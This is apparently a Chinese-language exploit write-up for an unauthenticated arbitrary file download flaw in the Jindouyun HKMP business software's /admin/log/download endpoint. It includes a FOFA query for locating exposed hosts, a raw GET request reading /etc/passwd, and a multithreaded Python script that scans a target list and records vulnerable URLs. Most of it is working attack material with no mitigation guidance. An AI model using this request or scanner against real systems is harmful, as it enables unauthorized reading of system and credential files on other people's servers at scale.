漏洞描述:
金斗云智慧商业软件是一款功能强大、易于使用的智慧管理系统,通过智能化的管理工具,帮助企业实现高效经营、优化流程、降低成本,并提升客户体验。无论是珠宝门店、4S店还是其他零售、服务行业,金斗云都能提供量身定制的解决方案,助力企业实现数字化转型和智能化升级。帮助企业提升业绩、优化流程、降低成本,并增强客户体验。金斗云 HKMP智慧商业软件 /admin/log/download接口 的file参数存在任意文件下载漏洞,未经身份验证的远程攻击者可以利用此漏洞读取任意文件内容。
fofa
body="金斗云 Copyright"
poc
GET /admin/log/download?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
复现成功
脚本
import requests
import threading
from urllib.parse import urlparse
import urllib3
# 禁用SSL警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def POC_1(target_url):
parsed_url = urlparse(target_url)
host = parsed_url.netloc
vuln_url = target_url + "/admin/log/download?file=/etc/passwd"
headers = {
"Host": host,
"Content-Type": "application/json;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15",
"Accept-Encoding": "gzip",
"Connection" : "close"
}
try:
response = requests.get(url=vuln_url, headers=headers, timeout=15, verify=False)
if response.status_code == 200 and "root" in response.text:
with open("存在漏洞的url.txt", 'a', encoding='UTF-8') as f:
print(f"\033[32m[o] 目标 {target_url} 存在漏洞")
f.write(target_url + "\n")
else:
print(f"\033[31m[x] 目标 {target_url} 不存在漏洞")
except Exception as e:
print(f"\033[31m[x] 请求失败 {target_url}: {e}")
def main():
threads = []
with open("./target.txt", "r", encoding='UTF-8') as f:
for line in f:
ip = line.strip()
thread = threading.Thread(target=POC_1, args=(ip,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if __name__ == "__main__":
main()